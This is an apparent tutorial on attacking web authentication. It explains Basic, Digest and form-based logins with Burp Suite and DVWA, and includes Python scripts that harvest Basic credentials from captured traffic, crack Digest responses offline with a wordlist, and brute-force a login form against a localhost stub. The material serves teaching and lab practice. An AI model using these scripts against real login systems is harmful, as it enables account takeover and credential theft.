Hacking web authentication – part 1 by Blackhat Pakistan
Today we will learn about Hacking web authentication.
Introduction
Authentication is the process of verifying that a claimed identity is genuine. When a client asks a web server for a resource, the server sometimes has to verify who the user is. To do this the user supplies some credentials and the server checks them; every later decision about that user is then based on the credentials the client supplied. This process is called authentication. Once the user is authenticated, the web server decides what that user is allowed to do with its resources, and whenever the user tries to access a resource, the server checks whether the user has the necessary permissions. This second process is called authorization. In this article, we’ll look at some common authentication types in use today, discuss their weaknesses, and then move on to some attacks against them.
Please note that in this article we will be using Burpsuite to analyze the submitted requests. Burpsuite is available in Backtrack by default. In order to intercept and modify requests, we need to configure our browser to use Burp’s proxy, which listens on 127.0.0.1:8080 by default. We’ll also be using Wireshark a bit.

Once this is done, open up Burpsuite, go to Proxy–>Intercept and make sure Intercept is on.

Now go to the Options tab and check that the proxy is listening on port 8080. Also, make sure that the “Generate CA-signed per-host certificates” option is checked. With this option, every time the browser connects to an SSL-protected website, Burpsuite generates a server certificate for that host on the fly and signs it with its own CA certificate, which Burp creates when it is first run. The purpose is to avoid the certificate errors a browser would otherwise raise when a proxy sits between it and an HTTPS site; for the warnings to disappear completely, the browser must also be configured to trust Burp’s CA certificate.

Now that we have properly set up Burpsuite and the proxy configuration in our browser, we can capture requests. Please note that whenever you submit a request, Burpsuite will intercept it and you will have to forward it manually. Therefore, it is advisable to leave “Intercept is on” enabled only when you really want to see the contents of the requests passing through.
Types of authentication
1. Basic HTTP authentication
HTTP Basic authentication uses a username and password combination to authenticate the user. The process is triggered when the client sends a GET request for a protected resource without supplying any credentials. The request is captured by Burpsuite and looks something like this.

The server responds with a 401 status (Apache’s reason phrase is “Authorization Required”) and a WWW-Authenticate header. We can see the packet in Wireshark. As we can see from the header, the authentication is of the “Basic” type. The browser recognizes this and shows the user a popup asking for a username and password. Please note that the popup is displayed by the browser, not the web application.

Once we enter the username and password and recapture the request with Burpsuite, we get something like the image below. The last line says “Authorization: Basic aW5mb3NlYzppbmZvc2VjaW5zdGl0dXRl”. That is the extra item now being passed in the header. The text after “Basic” is the credentials in encoded form, not encrypted form: the username and password are concatenated with a colon (:) between them, and the result is Base64 encoded. For example, if the username is “infosec” and the password is “infosecinstitute”, the string “infosec:infosecinstitute” is Base64 encoded to give the value above. The server takes the header value, decodes it to recover the credentials, and grants access if they are correct. It should be noted that decoding the string to recover the credentials is trivial, since Base64 provides no secrecy at all, so Basic authentication is highly vulnerable to eavesdropping attacks.

Wireshark is able to recognize this and automatically decodes the string to reveal the credentials as shown in the figure below.

As we can see in the Credentials section, the username and password are “infosec” and “infosecinstitute”. One problem with HTTP Basic authentication is that the credentials are effectively passed in plain text, and the browser resends them with every subsequent request to that realm. This risk can be reduced by using SSL/TLS, which encrypts the connection so the value of the Authorization header is not visible on the wire. However, it remains exposed to client-side attacks, including a man-in-the-middle who can get the client to accept his certificate, and to brute-force attacks, which we will see in the following sections.
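The following is an added example, not code from the original article: it reproduces in Python what the browser and Wireshark do with a Basic credential. It builds the Authorization header for the username and password used above, and then harvests credentials from a list of captured requests. The captured requests, the host address and the path are constructed for the demonstration.

```python
import base64
import binascii

# Constructed sample of captured HTTP requests, standing in for what Burp or
# Wireshark shows: first the unauthenticated GET, then the retry that carries
# the Authorization header discussed in the article.
CAPTURED_REQUESTS = [
    "GET /protected/ HTTP/1.1\r\nHost: 192.168.1.10\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /protected/ HTTP/1.1\r\nHost: 192.168.1.10\r\n"
    "Authorization: Basic aW5mb3NlYzppbmZvc2VjaW5zdGl0dXRl\r\n\r\n",
]


def build_basic_header(username: str, password: str) -> str:
    """What the browser does: 'user:pass', Base64-encoded. Encoding, not encryption."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def decode_basic(header_value: str):
    """Reverse the encoding the way Wireshark's 'Credentials' field does.

    Returns (username, password), or None if the value is not a well-formed
    Basic credential. A password may itself contain ':', so split only on the
    first colon (RFC 7617 forbids a colon in the username).
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    username, _, password = raw.partition(":")
    return username, password


def harvest_credentials(requests):
    """Pull every Basic credential out of a list of raw HTTP requests (passive sniffer view)."""
    found = []
    for raw in requests:
        head, _, _body = raw.partition("\r\n\r\n")
        for line in head.split("\r\n")[1:]:  # skip the request line
            name, _, value = line.partition(":")
            if name.strip().lower() == "authorization":
                creds = decode_basic(value)
                if creds:
                    found.append(creds)
    return found


if __name__ == "__main__":
    print(build_basic_header("infosec", "infosecinstitute"))
    for user, pw in harvest_credentials(CAPTURED_REQUESTS):
        print(f"username={user!r} password={pw!r}")
```

The header Burp showed above decodes straight back to infosec:infosecinstitute; note that the decoder rejects non-Base64 input and non-Basic schemes rather than crashing on them, which matters if you run it over a large capture.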
2. HTTP Digest authentication
Digest authentication was designed as an improvement over Basic HTTP authentication. The main improvement is that the password itself is never transmitted; instead a hash derived from it is sent. The user first requests the page without any credentials. The server responds with a WWW-Authenticate header indicating that credentials are required to access the resource, and also sends back a random value, usually called a “nonce”. The browser then uses a cryptographic hash function to create a message digest of the username, realm, password, nonce, HTTP method and page URL. The hash function is one-way, meaning that the digest can be computed from those values but cannot be reversed to reveal the values that produced it. By default, Digest authentication uses the MD5 hashing algorithm.
Digest authentication is less vulnerable to eavesdropping than Basic authentication, since the password never appears on the wire, but it is still vulnerable to replay attacks: if an attacker can capture a valid Authorization header and resend it, a server that accepts the same nonce again will grant access. To prevent this, servers usually embed a timestamp in the nonce (or track nonces they have issued); when the header comes back, the server checks the nonce and rejects the request if it has expired or has already been used. It is also worth being precise about brute force. All the other inputs to the digest (username, realm, nonce, URI and the HTTP method) travel in the clear in the captured request, so an eavesdropper has everything needed to test password guesses offline against the captured response value. Each guess costs a few MD5 computations, so this is only marginally more expensive than attacking Basic authentication, and the search space is still just the password space.
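To make the exchange above concrete, here is an added example (not code from the original article) of both sides of Digest authentication in Python, using the RFC 2617 construction without the qop extension: HA1 = MD5(username:realm:password), HA2 = MD5(method:uri), response = MD5(HA1:nonce:HA2). The realm, user database, nonce lifetime and the nonce format (timestamp plus an MD5 tag keyed with a per-process secret) are assumptions made for the demonstration. The last function shows the offline dictionary attack an eavesdropper can run on a captured header, and the server’s nonce check shows why a straight replay of an old capture fails.

```python
import hashlib
import hmac
import os
import time

REALM = "infosec-demo"                 # assumed realm name
USERS = {"infosec": "infosecinstitute"}  # constructed server-side credential store
SERVER_SECRET = os.urandom(16).hex()   # hypothetical per-process key that ties nonces to this server


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def make_nonce(now: float = None) -> str:
    """Server side: timestamp plus a keyed tag, so the server can later age out a replayed nonce."""
    ts = str(int(now if now is not None else time.time()))
    return f"{ts}:{md5_hex(ts + ':' + SERVER_SECRET)}"


def nonce_is_fresh(nonce: str, max_age: int = 300, now: float = None) -> bool:
    ts, _, tag = nonce.partition(":")
    if not hmac.compare_digest(tag, md5_hex(ts + ":" + SERVER_SECRET)):
        return False  # not one of ours, or the timestamp was tampered with
    return (now if now is not None else time.time()) - int(ts) <= max_age


def digest_response(username, password, method, uri, nonce, realm=REALM) -> str:
    """RFC 2617 (no qop): MD5(HA1:nonce:HA2) with HA1=MD5(user:realm:pass), HA2=MD5(method:uri)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def client_authorization(username, password, method, uri, nonce) -> str:
    """What the browser sends back. Everything except the password travels in the clear."""
    resp = digest_response(username, password, method, uri, nonce)
    return (f'Digest username="{username}", realm="{REALM}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}"')


def parse_digest(header: str) -> dict:
    scheme, _, rest = header.partition(" ")
    if scheme != "Digest":
        return {}
    fields = {}
    for part in rest.split(", "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip().strip('"')
    return fields


def server_verify(header: str, method: str, now: float = None) -> bool:
    """Server side: recompute the digest from the stored password and compare."""
    f = parse_digest(header)
    if not {"username", "realm", "nonce", "uri", "response"} <= f.keys() or f["realm"] != REALM:
        return False
    if not nonce_is_fresh(f["nonce"], now=now):
        return False  # expired nonce: a replayed capture lands here
    password = USERS.get(f["username"])
    if password is None:
        return False
    expected = digest_response(f["username"], password, method, f["uri"], f["nonce"])
    return hmac.compare_digest(expected, f["response"])


def offline_dictionary_attack(header: str, method: str, wordlist):
    """Eavesdropper's view: every digest input but the password is in the header, so guess offline."""
    f = parse_digest(header)
    for guess in wordlist:
        if digest_response(f["username"], guess, method, f["uri"], f["nonce"], f["realm"]) == f["response"]:
            return guess
    return None


if __name__ == "__main__":
    nonce = make_nonce()
    header = client_authorization("infosec", "infosecinstitute", "GET", "/protected/", nonce)
    print(header)
    print("server accepts:", server_verify(header, "GET"))
    print("stale replay accepted:", server_verify(header, "GET", now=time.time() + 3600))
    print("recovered offline:", offline_dictionary_attack(header, "GET", ["password", "infosecinstitute"]))
```

The method is bound into HA2, so a header captured from a GET cannot be reused for a POST, and the nonce check rejects the same header an hour later; neither of these stops the offline guess, which needs only the captured header and a wordlist.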
3. Form-based authentication
Form-based authentication uses a form (usually in HTML) with input tags that let the user enter a username and password. When the user submits the form, the values are sent to the server with either the GET or POST method over HTTP or HTTPS (with GET, the credentials end up in the URL and therefore in browser history, proxy and server logs, so POST should be used). If the server finds the credentials to be correct, the user is authenticated and is issued a random token or session ID that identifies the subsequent requests. One of the good things about form-based authentication is that there is no standardized way of encoding or transmitting the username and password, so it is highly customizable, and the attacks that target the specific encoding of HTTP Basic and Digest authentication do not apply to it directly. Form-based authentication is by far the most popular authentication method used in web applications. One problem with it is that the credentials are passed in plain text unless steps are taken to protect them, such as using TLS (Transport Layer Security).
Let’s look at an example of form-based authentication. For our exercise we will be using DVWA (Damn Vulnerable Web Application), and we will use the same application to perform a brute-force attack against form-based authentication. DVWA can be downloaded here.
Once downloaded and installed, log in with the default credentials {admin/password}, click the Brute Force tab on the left and click View Source to view the source. Please note that the security level is set to High in my case. As we can see, the form accepts a username and password, sanitizes them to neutralize special characters that could be used for SQL injection, and then passes them to an SQL query that checks the credentials against the database to see whether they are correct or not.

Let’s input any username/password and intercept the request using Burpsuite. Here is what it should look like in your case.

Attacking web authentication
In this section, we will perform a brute-force attack against form-based authentication at the “High” security level in DVWA. Note that brute-force attacks will not work in all cases. Some websites lock the account or start rejecting your requests after a set number of failed attempts, and some use a CAPTCHA to verify that the request is actually made by a human.
We will use the Intruder tool in Burpsuite to perform the brute-force attack. The main thing required for this attack is a list of common usernames and passwords. Go to the form, submit it with any username/password and capture the request. Once you have the request, right-click on it and click “Send to Intruder”.
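The following is an added example, not part of the original article, of what Intruder does in this attack, scripted in Python: every username in one list is tried against every password in another (Intruder’s cluster bomb mode), each attempt is sent as the same GET request Burp captured with the two payload positions filled in, and success is detected by a marker string in the response body. Because it has to run offline, the target is a constructed stub of the DVWA brute-force page started on localhost; the parameter names, the `security=high` cookie and the success/failure strings are assumed from DVWA’s form and source, and a real run would point at the DVWA instance instead. The stub can also simulate a site that locks out after N failures, which is the case the text warns about, and the attacker loop stops rather than hammering a locked target.

```python
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGIN_PATH = "/vulnerabilities/brute_force/"          # DVWA path, assumed
SUCCESS_MARKER = "Welcome to the password protected area"  # assumed from DVWA source
FAILURE_MARKER = "Username and/or password incorrect."     # assumed from DVWA source
VALID = {"admin": "password"}                          # constructed stub credential store


class StubLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for the DVWA brute-force page (GET username/password/Login)."""
    failures = 0
    lockout_after = None  # set by start_stub to simulate a site that locks after N failures

    def do_GET(self):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        user = query.get("username", [""])[0]
        pw = query.get("password", [""])[0]
        if StubLogin.lockout_after is not None and StubLogin.failures >= StubLogin.lockout_after:
            self._reply(429, "Too many failed attempts")
            return
        if VALID.get(user) == pw:
            self._reply(200, f"<p>{SUCCESS_MARKER} {user}</p>")
        else:
            StubLogin.failures += 1
            self._reply(200, f"<pre><br />{FAILURE_MARKER}</pre>")

    def _reply(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_stub(lockout_after=None):
    """Start the stub on a free localhost port; returns (server, host, port)."""
    StubLogin.failures = 0
    StubLogin.lockout_after = lockout_after
    srv = HTTPServer(("127.0.0.1", 0), StubLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[0], srv.server_address[1]


def try_login(host, port, username, password, path=LOGIN_PATH, cookie="security=high"):
    """One Intruder request: the captured GET with both payload positions filled in."""
    qs = urllib.parse.urlencode({"username": username, "password": password, "Login": "Login"})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", f"{path}?{qs}", headers={"Cookie": cookie})
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


def brute_force(host, port, usernames, passwords):
    """Cluster-bomb style: every username against every password.

    Returns (username, password) on the first hit, or None if the list is
    exhausted or the target starts rejecting attempts (lockout/rate limit).
    """
    for user in usernames:
        for pw in passwords:
            status, body = try_login(host, port, user, pw)
            if status == 429 or "Too many" in body:
                return None  # target is locking us out; more requests only make it worse
            if SUCCESS_MARKER in body:
                return user, pw
    return None


if __name__ == "__main__":
    srv, host, port = start_stub()
    print(brute_force(host, port, ["admin", "root"], ["123456", "letmein", "password"]))
    srv.shutdown()
```

In Intruder the equivalent steps are marking the username and password parameters as payload positions, loading a list into each, and sorting the results by response length or by a grep match on the success string; the length difference is usually what gives the hit away.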

Conclusion
In this article, we discussed some of the common authentication methods in use, the weaknesses in those methods, and then looked at ways to attack them. However, that is only part of the story. Many other authentication mechanisms have been developed in recent years, including one-time passwords, digital certificates and external authentication providers such as OpenID. A few other attacks not covered in this article are session hijacking, cookie stealing, cross-site request forgery and SQL injection. We will discuss all of these in the next article.